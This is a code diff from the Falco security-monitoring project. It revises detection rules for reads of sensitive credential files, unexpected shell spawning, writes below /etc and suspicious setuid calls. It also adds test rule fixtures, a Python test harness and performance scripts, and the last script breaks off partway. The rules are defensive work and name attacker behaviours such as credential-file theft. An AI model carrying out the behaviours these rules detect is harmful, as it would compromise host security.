condition: evt.dir = < and open_write and not shadowutils_binaries and not sysdigcloud_binaries_parent and not package_mgmt_binaries and etc_dir and not proc.sname=fbash condition: write_etc_common and not proc.sname=fbash
output: "File below /etc opened for writing (user=%user.name command=%proc.cmdline file=%fd.name)" output: "File below /etc opened for writing (user=%user.name command=%proc.cmdline file=%fd.name)"
priority: WARNING priority: WARNING
# Within a fbash session, the severity is lowered to INFO # Within a fbash session, the severity is lowered to INFO
- rule: write_etc_installer - rule: write_etc_installer
desc: an attempt to write to any file below /etc, in a pipe installer session desc: an attempt to write to any file below /etc, in a pipe installer session
condition: evt.dir = < and open_write and not shadowutils_binaries and not sysdigcloud_binaries_parent and not package_mgmt_binaries and etc_dir and proc.sname=fbash condition: write_etc_common and proc.sname=fbash
output: "File below /etc opened for writing (user=%user.name command=%proc.cmdline file=%fd.name) within pipe installer session" output: "File below /etc opened for writing (user=%user.name command=%proc.cmdline file=%fd.name) within pipe installer session"
priority: INFO priority: INFO
- rule: read_sensitive_file_untrusted - rule: read_sensitive_file_untrusted
desc: an attempt to read any sensitive file (e.g. files containing user/password/authentication information). Exceptions are made for known trusted programs. desc: an attempt to read any sensitive file (e.g. files containing user/password/authentication information). Exceptions are made for known trusted programs.
condition: open_read and not user_mgmt_binaries and not userexec_binaries and not proc.name in (iptables, ps, lsb_release, check-new-relea, dumpe2fs, accounts-daemon, bash, sshd) and not cron and sensitive_files condition: sensitive_files and open_read and not proc.name in (user_mgmt_binaries, userexec_binaries, package_mgmt_binaries, cron_binaries, iptables, ps, lsb_release, check-new-relea, dumpe2fs, accounts-daemon, bash, sshd) and not proc.cmdline contains /usr/bin/mandb
output: "Sensitive file opened for reading by non-trusted program (user=%user.name command=%proc.cmdline file=%fd.name)" output: "Sensitive file opened for reading by non-trusted program (user=%user.name command=%proc.cmdline file=%fd.name)"
priority: WARNING priority: WARNING
- rule: read_sensitive_file_trusted_after_startup - rule: read_sensitive_file_trusted_after_startup
desc: an attempt to read any sensitive file (e.g. files containing user/password/authentication information) by a trusted program after startup. Trusted programs might read these files at startup to load initial state, but not afterwards. desc: an attempt to read any sensitive file (e.g. files containing user/password/authentication information) by a trusted program after startup. Trusted programs might read these files at startup to load initial state, but not afterwards.
condition: open_read and server_binaries and not proc_is_new and sensitive_files and proc.name!="sshd" condition: sensitive_files and open_read and server_procs and not proc_is_new and proc.name!="sshd"
output: "Sensitive file opened for reading by trusted program after startup (user=%user.name command=%proc.cmdline file=%fd.name)" output: "Sensitive file opened for reading by trusted program after startup (user=%user.name command=%proc.cmdline file=%fd.name)"
priority: WARNING priority: WARNING
# Only let rpm-related programs write to the rpm database # Only let rpm-related programs write to the rpm database
- rule: write_rpm_database - rule: write_rpm_database
desc: an attempt to write to the rpm database by any non-rpm related program desc: an attempt to write to the rpm database by any non-rpm related program
condition: open_write and not proc.name in (rpm,rpmkey,yum) and fd.directory=/var/lib/rpm condition: fd.name startswith /var/lib/rpm and open_write and not proc.name in (rpm,rpmkey,yum)
output: "Rpm database opened for writing by a non-rpm program (command=%proc.cmdline file=%fd.name)" output: "Rpm database opened for writing by a non-rpm program (command=%proc.cmdline file=%fd.name)"
priority: WARNING priority: WARNING
- rule: db_program_spawned_process - rule: db_program_spawned_process
desc: a database-server related program spawned a new process other than itself. This shouldn\'t occur and is a follow on from some SQL injection attacks. desc: a database-server related program spawned a new process other than itself. This shouldn\'t occur and is a follow on from some SQL injection attacks.
condition: db_server_binaries_parent and not db_server_binaries and spawned_process condition: proc.pname in (db_server_binaries) and spawned_process and not proc.name in (db_server_binaries)
output: "Database-related program spawned process other than itself (user=%user.name program=%proc.cmdline parent=%proc.pname)" output: "Database-related program spawned process other than itself (user=%user.name program=%proc.cmdline parent=%proc.pname)"
priority: WARNING priority: WARNING
- rule: modify_binary_dirs - rule: modify_binary_dirs
desc: an attempt to modify any file below a set of binary directories. desc: an attempt to modify any file below a set of binary directories.
condition: modify and bin_dir_rename and not package_mgmt_binaries condition: bin_dir_rename and modify and not package_mgmt_procs
output: "File below known binary directory renamed/removed (user=%user.name command=%proc.cmdline operation=%evt.type file=%fd.name %evt.args)" output: "File below known binary directory renamed/removed (user=%user.name command=%proc.cmdline operation=%evt.type file=%fd.name %evt.args)"
priority: WARNING priority: WARNING
- rule: mkdir_binary_dirs - rule: mkdir_binary_dirs
desc: an attempt to create a directory below a set of binary directories. desc: an attempt to create a directory below a set of binary directories.
condition: mkdir and bin_dir_mkdir and not package_mgmt_binaries condition: mkdir and bin_dir_mkdir and not package_mgmt_procs
output: "Directory below known binary directory created (user=%user.name command=%proc.cmdline directory=%evt.arg.path)" output: "Directory below known binary directory created (user=%user.name command=%proc.cmdline directory=%evt.arg.path)"
priority: WARNING priority: WARNING
@ -261,13 +258,13 @@
- rule: change_thread_namespace - rule: change_thread_namespace
desc: an attempt to change a program/thread\'s namespace (commonly done as a part of creating a container) by calling setns. desc: an attempt to change a program/thread\'s namespace (commonly done as a part of creating a container) by calling setns.
condition: syscall.type = setns and not proc.name in (docker, sysdig, dragent) condition: evt.type = setns and not proc.name in (docker, sysdig, dragent, nsenter, exe)
output: "Namespace change (setns) by unexpected program (user=%user.name command=%proc.cmdline container=%container.id)" output: "Namespace change (setns) by unexpected program (user=%user.name command=%proc.cmdline container=%container.id)"
priority: WARNING priority: WARNING
- rule: run_shell_untrusted - rule: run_shell_untrusted
desc: an attempt to spawn a shell by a non-shell program. Exceptions are made for trusted binaries. desc: an attempt to spawn a shell by a non-shell program. Exceptions are made for trusted binaries.
condition: not container and proc.name = bash and spawned_process and proc.pname exists and not parent_cron and not proc.pname in (bash, sshd, sudo, docker, su, tmux, screen, emacs, systemd, login, flock, fbash, nginx, monit, supervisord, dragent) condition: spawned_process and not container and proc.name = bash and proc.pname exists and not proc.pname in (cron_binaries, bash, sshd, sudo, docker, su, tmux, screen, emacs, systemd, login, flock, fbash, nginx, monit, supervisord, dragent)
output: "Shell spawned by untrusted binary (user=%user.name shell=%proc.name parent=%proc.pname cmdline=%proc.cmdline)" output: "Shell spawned by untrusted binary (user=%user.name shell=%proc.name parent=%proc.pname cmdline=%proc.cmdline)"
priority: WARNING priority: WARNING
@ -284,14 +281,14 @@
- rule: run_shell_in_container - rule: run_shell_in_container
desc: a shell was spawned by a non-shell program in a container. Container entrypoints are excluded. desc: a shell was spawned by a non-shell program in a container. Container entrypoints are excluded.
condition: container and proc.name = bash and spawned_process and proc.pname exists and not proc.pname in (bash, docker) condition: spawned_process and container and proc.name = bash and proc.pname exists and not proc.pname in (sh, bash, docker)
output: "Shell spawned in a container other than entrypoint (user=%user.name container_id=%container.id container_name=%container.name shell=%proc.name parent=%proc.pname cmdline=%proc.cmdline)" output: "Shell spawned in a container other than entrypoint (user=%user.name container_id=%container.id container_name=%container.name shell=%proc.name parent=%proc.pname cmdline=%proc.cmdline)"
priority: WARNING priority: WARNING
# sockfamily ip is to exclude certain processes (like 'groups') that communicate on unix-domain sockets # sockfamily ip is to exclude certain processes (like 'groups') that communicate on unix-domain sockets
- rule: system_binaries_network_activity - rule: system_procs_network_activity
desc: any network activity performed by system binaries that are not expected to send or receive any network traffic desc: any network activity performed by system binaries that are not expected to send or receive any network traffic
condition: (inbound or outbound) and (fd.sockfamily = ip and system_binaries) condition: (fd.sockfamily = ip and system_procs) and (inbound or outbound)
output: "Known system binary sent/received network traffic (user=%user.name command=%proc.cmdline connection=%fd.name)" output: "Known system binary sent/received network traffic (user=%user.name command=%proc.cmdline connection=%fd.name)"
priority: WARNING priority: WARNING
@ -304,23 +301,23 @@
# output: "sshd sent error message to syslog (error=%evt.buffer)" # output: "sshd sent error message to syslog (error=%evt.buffer)"
# priority: WARNING # priority: WARNING
# sshd, sendmail-msp, sendmail attempt to setuid to root even when running as non-root. Excluding here to avoid meaningless FPs # sshd, mail programs attempt to setuid to root even when running as non-root. Excluding here to avoid meaningless FPs
- rule: non_sudo_setuid - rule: non_sudo_setuid
desc: an attempt to change users by calling setuid. sudo/su are excluded. user "root" is also excluded, as setuid calls typically involve dropping privileges. desc: an attempt to change users by calling setuid. sudo/su are excluded. user "root" is also excluded, as setuid calls typically involve dropping privileges.
condition: evt.type=setuid and evt.dir=> and not user.name=root and not userexec_binaries and not proc.name in (sshd, sendmail-msp, sendmail) condition: evt.type=setuid and evt.dir=> and not user.name=root and not proc.name in (userexec_binaries, mail_binaries, sshd)
output: "Unexpected setuid call by non-sudo, non-root program (user=%user.name command=%proc.cmdline uid=%evt.arg.uid)" output: "Unexpected setuid call by non-sudo, non-root program (user=%user.name command=%proc.cmdline uid=%evt.arg.uid)"
priority: WARNING priority: WARNING
- rule: user_mgmt_binaries - rule: user_mgmt_binaries
desc: activity by any programs that can manage users, passwords, or permissions. sudo and su are excluded. Activity in containers is also excluded--some containers create custom users on top of a base linux distribution at startup. desc: activity by any programs that can manage users, passwords, or permissions. sudo and su are excluded. Activity in containers is also excluded--some containers create custom users on top of a base linux distribution at startup.
condition: spawned_process and not proc.name in (su, sudo) and not container and user_mgmt_binaries and not parent_cron and not proc.pname in (systemd, run-parts) condition: spawned_process and proc.name in (user_mgmt_binaries) and not proc.name in (su, sudo) and not container and not proc.pname in (cron_binaries, systemd, run-parts)
output: "User management binary command run outside of container (user=%user.name command=%proc.cmdline parent=%proc.pname)" output: "User management binary command run outside of container (user=%user.name command=%proc.cmdline parent=%proc.pname)"
priority: WARNING priority: WARNING
# (we may need to add additional checks against false positives, see: https://bugs.launchpad.net/ubuntu/+source/rkhunter/+bug/86153) # (we may need to add additional checks against false positives, see: https://bugs.launchpad.net/ubuntu/+source/rkhunter/+bug/86153)
- rule: create_files_below_dev - rule: create_files_below_dev
desc: creating any files below /dev other than known programs that manage devices. Some rootkits hide files in /dev. desc: creating any files below /dev other than known programs that manage devices. Some rootkits hide files in /dev.
condition: (evt.type = creat or evt.arg.flags contains O_CREAT) and proc.name != blkid and fd.directory = /dev and fd.name != /dev/null condition: fd.directory = /dev and (evt.type = creat or (evt.type = open and evt.arg.flags contains O_CREAT)) and proc.name != blkid and not fd.name in (/dev/null,/dev/stdin,/dev/stdout,/dev/stderr,/dev/tty)
output: "File created below /dev by untrusted program (user=%user.name command=%proc.cmdline file=%fd.name)" output: "File created below /dev by untrusted program (user=%user.name command=%proc.cmdline file=%fd.name)"
priority: WARNING priority: WARNING
@ -339,7 +336,7 @@
- rule: installer_bash_non_https_connection - rule: installer_bash_non_https_connection
desc: an attempt by a program in a pipe installer session to make an outgoing connection on a non-http(s) port desc: an attempt by a program in a pipe installer session to make an outgoing connection on a non-http(s) port
condition: outbound and not fd.sport in (80, 443, 53) and proc.sname=fbash condition: proc.sname=fbash and outbound and not fd.sport in (80, 443, 53)
output: "Outbound connection on non-http(s) port by a process in a fbash session (command=%proc.cmdline connection=%fd.name)" output: "Outbound connection on non-http(s) port by a process in a fbash session (command=%proc.cmdline connection=%fd.name)"
priority: WARNING priority: WARNING
@ -361,7 +358,7 @@
# as a part of doing the installation # as a part of doing the installation
- rule: installer_bash_runs_pkgmgmt - rule: installer_bash_runs_pkgmgmt
desc: an attempt by a program in a pipe installer session to run a package management binary desc: an attempt by a program in a pipe installer session to run a package management binary
condition: evt.type=execve and package_mgmt_binaries and proc.sname=fbash condition: evt.type=execve and package_mgmt_procs and proc.sname=fbash
output: "Package management program run by process in a fbash session (command=%proc.cmdline)" output: "Package management program run by process in a fbash session (command=%proc.cmdline)"
priority: INFO priority: INFO
@ -530,6 +527,6 @@
# - rule: http_server_unexpected_network_inbound # - rule: http_server_unexpected_network_inbound
# desc: inbound network traffic to a http server program on a port other than the standard ports # desc: inbound network traffic to a http server program on a port other than the standard ports
# condition: http_server_binaries and inbound and fd.sport != 80 and fd.sport != 443 # condition: proc.name in (http_server_binaries) and inbound and fd.sport != 80 and fd.sport != 443
# output: "Inbound network traffic to HTTP Server on unexpected port (connection=%fd.name)" # output: "Inbound network traffic to HTTP Server on unexpected port (connection=%fd.name)"
# priority: WARNING # priority: WARNING

9
test/cpu_monitor.sh Normal file
View File

@ -0,0 +1,9 @@
#!/bin/bash
SUBJ_PID=$1
BENCHMARK=$2
VARIANT=$3
RESULTS_FILE=$4
CPU_INTERVAL=$5
top -d $CPU_INTERVAL -b -p $SUBJ_PID | grep -E '(falco|sysdig|dragent)' --line-buffered | awk -v benchmark=$BENCHMARK -v variant=$VARIANT '{printf("{\"time\": \"%s\", \"sample\": %d, \"benchmark\": \"%s\", \"variant\": \"%s\", \"cpu_usage\": %s},\n", strftime("%Y-%m-%d %H:%M:%S", systime(), 1), NR, benchmark, variant, $9); fflush();}' >> $RESULTS_FILE

BIN
test/empty.scap Normal file

Binary file not shown.

View File

@ -0,0 +1,186 @@
- rule: no_warnings
desc: Rule with no warnings
condition: evt.type=execve
output: "None"
priority: WARNING
- rule: no_evttype
desc: No evttype at all
condition: proc.name=foo
output: "None"
priority: WARNING
- rule: evttype_not_equals
desc: Using != for event type
condition: evt.type!=execve
output: "None"
priority: WARNING
- rule: leading_not
desc: condition starts with not
condition: not evt.type=execve
output: "None"
priority: WARNING
- rule: not_equals_after_evttype
desc: != after evt.type, not affecting results
condition: evt.type=execve and proc.name!=foo
output: "None"
priority: WARNING
- rule: not_after_evttype
desc: not operator after evt.type, not affecting results
condition: evt.type=execve and not proc.name=foo
output: "None"
priority: WARNING
- rule: leading_trailing_evttypes
desc: evttype at beginning and end
condition: evt.type=execve and proc.name=foo or evt.type=open
output: "None"
priority: WARNING
- rule: leading_multtrailing_evttypes
desc: one evttype at beginning, multiple at end
condition: evt.type=execve and proc.name=foo or evt.type=open or evt.type=connect
output: "None"
priority: WARNING
- rule: leading_multtrailing_evttypes_using_in
desc: one evttype at beginning, multiple at end, using in
condition: evt.type=execve and proc.name=foo or evt.type in (open, connect)
output: "None"
priority: WARNING
- rule: not_equals_at_end
desc: not_equals at final evttype
condition: evt.type=execve and proc.name=foo or evt.type=open or evt.type!=connect
output: "None"
priority: WARNING
- rule: not_at_end
desc: not operator for final evttype
condition: evt.type=execve and proc.name=foo or evt.type=open or not evt.type=connect
output: "None"
priority: WARNING
- rule: not_before_trailing_evttype
desc: a not before a trailing event type
condition: evt.type=execve and not proc.name=foo or evt.type=open
output: "None"
priority: WARNING
- rule: not_equals_before_trailing_evttype
desc: a != before a trailing event type
condition: evt.type=execve and proc.name!=foo or evt.type=open
output: "None"
priority: WARNING
- rule: not_equals_and_not
desc: both != and not before event types
condition: evt.type=execve and proc.name!=foo or evt.type=open or not evt.type=connect
output: "None"
priority: WARNING
- rule: not_equals_before_in
desc: != before an in with event types
condition: evt.type=execve and proc.name!=foo or evt.type in (open, connect)
output: "None"
priority: WARNING
- rule: not_before_in
desc: a not before an in with event types
condition: evt.type=execve and not proc.name=foo or evt.type in (open, connect)
output: "None"
priority: WARNING
- rule: not_in_before_in
desc: a not with in before an in with event types
condition: evt.type=execve and not proc.name in (foo, bar) or evt.type in (open, connect)
output: "None"
priority: WARNING
- rule: evttype_in
desc: using in for event types
condition: evt.type in (execve, open)
output: "None"
priority: WARNING
- rule: evttype_in_plus_trailing
desc: using in for event types and a trailing evttype
condition: evt.type in (execve, open) and proc.name=foo or evt.type=connect
output: "None"
priority: WARNING
- rule: leading_in_not_equals_before_evttype
desc: initial in() for event types, then a != before an additional event type
condition: evt.type in (execve, open) and proc.name!=foo or evt.type=connect
output: "None"
priority: WARNING
- rule: leading_in_not_equals_at_evttype
desc: initial in() for event types, then a != with an additional event type
condition: evt.type in (execve, open) or evt.type!=connect
output: "None"
priority: WARNING
- rule: not_with_evttypes
desc: not in for event types
condition: not evt.type in (execve, open)
output: "None"
priority: WARNING
- rule: not_with_evttypes_addl
desc: not in for event types, and an additional event type
condition: not evt.type in (execve, open) or evt.type=connect
output: "None"
priority: WARNING
- rule: not_equals_before_evttype
desc: != before any event type
condition: proc.name!=foo and evt.type=execve
output: "None"
priority: WARNING
- rule: not_equals_before_in_evttype
desc: != before any event type using in
condition: proc.name!=foo and evt.type in (execve, open)
output: "None"
priority: WARNING
- rule: not_before_evttype
desc: not operator before any event type
condition: not proc.name=foo and evt.type=execve
output: "None"
priority: WARNING
- rule: not_before_evttype_using_in
desc: not operator before any event type using in
condition: not proc.name=foo and evt.type in (execve, open)
output: "None"
priority: WARNING
- rule: repeated_evttypes
desc: event types appearing multiple times
condition: evt.type=open or evt.type=open
output: "None"
priority: WARNING
- rule: repeated_evttypes_with_in
desc: event types appearing multiple times with in
condition: evt.type in (open, open)
output: "None"
priority: WARNING
- rule: repeated_evttypes_with_separate_in
desc: event types appearing multiple times with separate ins
condition: evt.type in (open) or evt.type in (open, open)
output: "None"
priority: WARNING
- rule: repeated_evttypes_with_mix
desc: event types appearing multiple times with mix of = and in
condition: evt.type=open or evt.type in (open, open)
output: "None"
priority: WARNING

View File

@ -3,6 +3,7 @@
import os import os
import re import re
import json import json
import sets
from avocado import Test from avocado import Test
from avocado.utils import process from avocado.utils import process
@ -16,9 +17,34 @@ class FalcoTest(Test):
""" """
self.falcodir = self.params.get('falcodir', '/', default=os.path.join(self.basedir, '../build')) self.falcodir = self.params.get('falcodir', '/', default=os.path.join(self.basedir, '../build'))
self.should_detect = self.params.get('detect', '*') self.should_detect = self.params.get('detect', '*', default=False)
self.trace_file = self.params.get('trace_file', '*') self.trace_file = self.params.get('trace_file', '*')
self.json_output = self.params.get('json_output', '*')
if not os.path.isabs(self.trace_file):
self.trace_file = os.path.join(self.basedir, self.trace_file)
self.json_output = self.params.get('json_output', '*', default=False)
self.rules_file = self.params.get('rules_file', '*', default=os.path.join(self.basedir, '../rules/falco_rules.yaml'))
if not os.path.isabs(self.rules_file):
self.rules_file = os.path.join(self.basedir, self.rules_file)
self.rules_warning = self.params.get('rules_warning', '*', default=False)
if self.rules_warning == False:
self.rules_warning = sets.Set()
else:
self.rules_warning = sets.Set(self.rules_warning)
# Maps from rule name to set of evttypes
self.rules_events = self.params.get('rules_events', '*', default=False)
if self.rules_events == False:
self.rules_events = {}
else:
events = {}
for item in self.rules_events:
for item2 in item:
events[item2[0]] = sets.Set(item2[1])
self.rules_events = events
if self.should_detect: if self.should_detect:
self.detect_level = self.params.get('detect_level', '*') self.detect_level = self.params.get('detect_level', '*')
@ -33,21 +59,38 @@ class FalcoTest(Test):
self.str_variant = self.trace_file self.str_variant = self.trace_file
def test(self): def check_rules_warnings(self, res):
self.log.info("Trace file %s", self.trace_file)
# Run the provided trace file though falco found_warning = sets.Set()
cmd = '{}/userspace/falco/falco -r {}/../rules/falco_rules.yaml -c {}/../falco.yaml -e {} -o json_output={}'.format(
self.falcodir, self.falcodir, self.falcodir, self.trace_file, self.json_output)
self.falco_proc = process.SubProcess(cmd) for match in re.finditer('Rule ([^:]+): warning \(([^)]+)\):', res.stderr):
rule = match.group(1)
warning = match.group(2)
found_warning.add(rule)
res = self.falco_proc.run(timeout=60, sig=9) self.log.debug("Expected warning rules: {}".format(self.rules_warning))
self.log.debug("Actual warning rules: {}".format(found_warning))
if res.exit_status != 0: if found_warning != self.rules_warning:
self.error("Falco command \"{}\" exited with non-zero return value {}".format( self.fail("Expected rules with warnings {} does not match actual rules with warnings {}".format(self.rules_warning, found_warning))
cmd, res.exit_status))
def check_rules_events(self, res):
found_events = {}
for match in re.finditer('Event types for rule ([^:]+): (\S+)', res.stderr):
rule = match.group(1)
events = sets.Set(match.group(2).split(","))
found_events[rule] = events
self.log.debug("Expected events for rules: {}".format(self.rules_events))
self.log.debug("Actual events for rules: {}".format(found_events))
for rule in found_events.keys():
if found_events.get(rule) != self.rules_events.get(rule):
self.fail("rule {}: expected events {} differs from actual events {}".format(rule, self.rules_events.get(rule), found_events.get(rule)))
def check_detections(self, res):
# Get the number of events detected. # Get the number of events detected.
match = re.search('Events detected: (\d+)', res.stdout) match = re.search('Events detected: (\d+)', res.stdout)
if match is None: if match is None:
@ -73,6 +116,7 @@ class FalcoTest(Test):
if not events_detected > 0: if not events_detected > 0:
self.fail("Detected {} events at level {} when should have detected > 0".format(events_detected, self.detect_level)) self.fail("Detected {} events at level {} when should have detected > 0".format(events_detected, self.detect_level))
def check_json_output(self, res):
if self.json_output: if self.json_output:
# Just verify that any lines starting with '{' are valid json objects. # Just verify that any lines starting with '{' are valid json objects.
# Doesn't do any deep inspection of the contents. # Doesn't do any deep inspection of the contents.
@ -82,6 +126,27 @@ class FalcoTest(Test):
for attr in ['time', 'rule', 'priority', 'output']: for attr in ['time', 'rule', 'priority', 'output']:
if not attr in obj: if not attr in obj:
self.fail("Falco JSON object {} does not contain property \"{}\"".format(line, attr)) self.fail("Falco JSON object {} does not contain property \"{}\"".format(line, attr))
def test(self):
self.log.info("Trace file %s", self.trace_file)
# Run the provided trace file though falco
cmd = '{}/userspace/falco/falco -r {} -c {}/../falco.yaml -e {} -o json_output={} -v'.format(
self.falcodir, self.rules_file, self.falcodir, self.trace_file, self.json_output)
self.falco_proc = process.SubProcess(cmd)
res = self.falco_proc.run(timeout=180, sig=9)
if res.exit_status != 0:
self.error("Falco command \"{}\" exited with non-zero return value {}".format(
cmd, res.exit_status))
self.check_rules_warnings(res)
if len(self.rules_events) > 0:
self.check_rules_events(res)
self.check_detections(res)
self.check_json_output(res)
pass pass

62
test/falco_tests.yaml.in Normal file
View File

@ -0,0 +1,62 @@
trace_files: !mux
builtin_rules_no_warnings:
detect: False
trace_file: empty.scap
rules_warning: False
test_warnings:
detect: False
trace_file: empty.scap
rules_file: falco_rules_warnings.yaml
rules_warning:
- no_evttype
- evttype_not_equals
- leading_not
- not_equals_at_end
- not_at_end
- not_before_trailing_evttype
- not_equals_before_trailing_evttype
- not_equals_and_not
- not_equals_before_in
- not_before_in
- not_in_before_in
- leading_in_not_equals_before_evttype
- leading_in_not_equals_at_evttype
- not_with_evttypes
- not_with_evttypes_addl
- not_equals_before_evttype
- not_equals_before_in_evttype
- not_before_evttype
- not_before_evttype_using_in
rules_events:
- no_warnings: [execve]
- no_evttype: [all]
- evttype_not_equals: [all]
- leading_not: [all]
- not_equals_after_evttype: [execve]
- not_after_evttype: [execve]
- leading_trailing_evttypes: [execve,open]
- leading_multtrailing_evttypes: [connect,execve,open]
- leading_multtrailing_evttypes_using_in: [connect,execve,open]
- not_equals_at_end: [all]
- not_at_end: [all]
- not_before_trailing_evttype: [all]
- not_equals_before_trailing_evttype: [all]
- not_equals_and_not: [all]
- not_equals_before_in: [all]
- not_before_in: [all]
- not_in_before_in: [all]
- evttype_in: [execve,open]
- evttype_in_plus_trailing: [connect,execve,open]
- leading_in_not_equals_before_evttype: [all]
- leading_in_not_equals_at_evttype: [all]
- not_with_evttypes: [all]
- not_with_evttypes_addl: [all]
- not_equals_before_evttype: [all]
- not_equals_before_in_evttype: [all]
- not_before_evttype: [all]
- not_before_evttype_using_in: [all]
- repeated_evttypes: [open]
- repeated_evttypes_with_in: [open]
- repeated_evttypes_with_separate_in: [open]
- repeated_evttypes_with_mix: [open]

40
test/plot-live.r Normal file
View File

@ -0,0 +1,40 @@
require(jsonlite)
library(ggplot2)
library(GetoptLong)
initial.options <- commandArgs(trailingOnly = FALSE)
file.arg.name <- "--file="
script.name <- sub(file.arg.name, "", initial.options[grep(file.arg.name, initial.options)])
script.basename <- dirname(script.name)
if (substr(script.basename, 1, 1) != '/') {
script.basename = paste(getwd(), script.basename, sep='/')
}
results = paste(script.basename, "results.json", sep='/')
output = "./output.png"
GetoptLong(
"results=s", "Path to results file",
"benchmark=s", "Benchmark from results file to graph",
"variant=s@", "Variant(s) to include in graph. Can be specified multiple times",
"output=s", "Output graph file"
)
res <- fromJSON(results, flatten=TRUE)
res2 = res[res$benchmark == benchmark & res$variant %in% variant,]
plot <- ggplot(data=res2, aes(x=sample, y=cpu_usage, group=variant, colour=variant)) +
geom_line() +
ylab("CPU Usage (%)") +
xlab("Time") +
ggtitle(sprintf("Falco/Sysdig CPU Usage: %s", benchmark))
theme(legend.position=c(.2, .88));
print(paste("Writing graph to", output, sep=" "))
ggsave(file=output)

35
test/plot-traces.r Normal file
View File

@ -0,0 +1,35 @@
require(jsonlite)
library(ggplot2)
library(reshape)
res <- fromJSON("/home/mstemm/results.txt", flatten=TRUE)
plot <- ggplot(data=res, aes(x=config, y=elapsed.real)) +
geom_bar(stat = "summary", fun.y = "mean") +
coord_flip() +
facet_grid(shortfile ~ .) +
ylab("Wall Clock Time (sec)") +
xlab("Trace File/Program")
ggsave(file="/mnt/sf_mstemm/res-real.png")
plot <- ggplot(data=res, aes(x=config, y=elapsed.user)) +
geom_bar(stat = "summary", fun.y = "mean") +
coord_flip() +
facet_grid(shortfile ~ .) +
ylab("User Time (sec)") +
xlab("Trace File/Program")
ggsave(file="/mnt/sf_mstemm/res-user.png")
res2 <- melt(res, id.vars = c("config", "shortfile"), measure.vars = c("elapsed.sys", "elapsed.user"))
plot <- ggplot(data=res2, aes(x=config, y=value, fill=variable, order=variable)) +
geom_bar(stat = "summary", fun.y = "mean") +
coord_flip() +
facet_grid(shortfile ~ .) +
ylab("User/System Time (sec)") +
xlab("Trace File/Program")
ggsave(file="/mnt/sf_mstemm/res-sys-user.png")

View File

@ -0,0 +1,391 @@
#!/bin/bash
#set -x
trap "cleanup; exit" SIGHUP SIGINT SIGTERM
function download_trace_files() {
(mkdir -p $TRACEDIR && rm -rf $TRACEDIR/traces-perf && curl -fo $TRACEDIR/traces-perf.zip https://s3.amazonaws.com/download.draios.com/falco-tests/traces-perf.zip && unzip -d $TRACEDIR $TRACEDIR/traces-perf.zip && rm -f $TRACEDIR/traces-perf.zip) || exit 1
}
function time_cmd() {
cmd="$1"
file="$2"
benchmark=`basename $file .scap`
echo -n "$benchmark: "
for i in `seq 1 5`; do
echo -n "$i "
time=`date --iso-8601=sec`
/usr/bin/time -a -o $RESULTS_FILE --format "{\"time\": \"$time\", \"benchmark\": \"$benchmark\", \"file\": \"$file\", \"variant\": \"$VARIANT\", \"elapsed\": {\"real\": %e, \"user\": %U, \"sys\": %S}}," $cmd >> $OUTPUT_FILE 2>&1
done
echo ""
}
function run_falco_on() {
file="$1"
cmd="$ROOT/userspace/falco/falco -c $ROOT/../falco.yaml -r $ROOT/../rules/falco_rules.yaml --option=stdout_output.enabled=false -e $file"
time_cmd "$cmd" "$file"
}
function run_sysdig_on() {
file="$1"
cmd="$ROOT/userspace/sysdig/sysdig -N -z -r $file evt.type=none"
time_cmd "$cmd" "$file"
}
function write_agent_config() {
cat > $ROOT/userspace/dragent/dragent.yaml <<EOF
customerid: XXX
app_checks_enabled: false
log:
file_priority: info
console_priority: info
event_priority: info
jmx:
enabled: false
statsd:
enabled: false
collector: collector-staging.sysdigcloud.com
EOF
if [ $FALCO_AGENT == 1 ]; then
cat >> $ROOT/userspace/dragent/dragent.yaml <<EOF
falco_engine:
enabled: true
rules_filename: /etc/falco_rules.yaml
sampling_multiplier: 0
EOF
else
cat >> $ROOT/userspace/dragent/dragent.yaml <<EOF
falco_engine:
enabled: false
EOF
fi
if [ $AGENT_AUTODROP == 1 ]; then
cat >> $ROOT/userspace/dragent/dragent.yaml <<EOF
autodrop:
enabled: true
EOF
else
cat >> $ROOT/userspace/dragent/dragent.yaml <<EOF
autodrop:
enabled: false
EOF
fi
cat $ROOT/userspace/dragent/dragent.yaml
}
function run_agent_on() {
file="$1"
write_agent_config
cmd="$ROOT/userspace/dragent/dragent -r $file"
time_cmd "$cmd" "$file"
}
function run_trace() {
if [ ! -e $TRACEDIR ]; then
download_trace_files
fi
trace_file="$1"
if [ $trace_file == "all" ]; then
files=($TRACEDIR/traces-perf/*.scap)
else
files=($TRACEDIR/traces-perf/$trace_file.scap)
fi
for file in ${files[@]}; do
if [[ $ROOT == *"falco"* ]]; then
run_falco_on "$file"
elif [[ $ROOT == *"sysdig"* ]]; then
run_sysdig_on "$file"
else
run_agent_on "$file"
fi
done
}
function start_monitor_cpu_usage() {
echo " monitoring cpu usage for sysdig/falco program"
setsid bash `dirname $0`/cpu_monitor.sh $SUBJ_PID $live_test $VARIANT $RESULTS_FILE $CPU_INTERVAL &
CPU_PID=$!
sleep 5
}
function start_subject_prog() {
echo " starting falco/sysdig/agent program"
# Do a blocking sudo command now just to ensure we have a password
sudo bash -c ""
if [[ $ROOT == *"falco"* ]]; then
sudo $ROOT/userspace/falco/falco -c $ROOT/../falco.yaml -r $ROOT/../rules/falco_rules.yaml --option=stdout_output.enabled=false > ./prog-output.txt 2>&1 &
elif [[ $ROOT == *"sysdig"* ]]; then
sudo $ROOT/userspace/sysdig/sysdig -N -z evt.type=none &
else
write_agent_config
pushd $ROOT/userspace/dragent
sudo ./dragent > ./prog-output.txt 2>&1 &
popd
fi
SUDO_PID=$!
sleep 5
if [[ $ROOT == *"agent"* ]]; then
# The agent spawns several processes all below a main monitor
# process. We want the child with the lowest pid.
MON_PID=`ps -h -o pid --ppid $SUDO_PID`
SUBJ_PID=`ps -h -o pid --ppid $MON_PID | head -1`
else
SUBJ_PID=`ps -h -o pid --ppid $SUDO_PID`
fi
if [ -z $SUBJ_PID ]; then
echo "Could not find pid of subject program--did it start successfully? Not continuing."
exit 1
fi
}
function run_htop() {
screen -S htop-screen -d -m /usr/bin/htop -d2
sleep 90
screen -X -S htop-screen quit
}
function run_juttle_examples() {
pushd $SCRIPTDIR/../../juttle-engine/examples
docker-compose -f dc-juttle-engine.yml -f aws-cloudwatch/dc-aws-cloudwatch.yml -f elastic-newstracker/dc-elastic.yml -f github-tutorial/dc-elastic.yml -f nginx_logs/dc-nginx-logs.yml -f postgres-diskstats/dc-postgres.yml -f cadvisor-influx/dc-cadvisor-influx.yml up -d
sleep 120
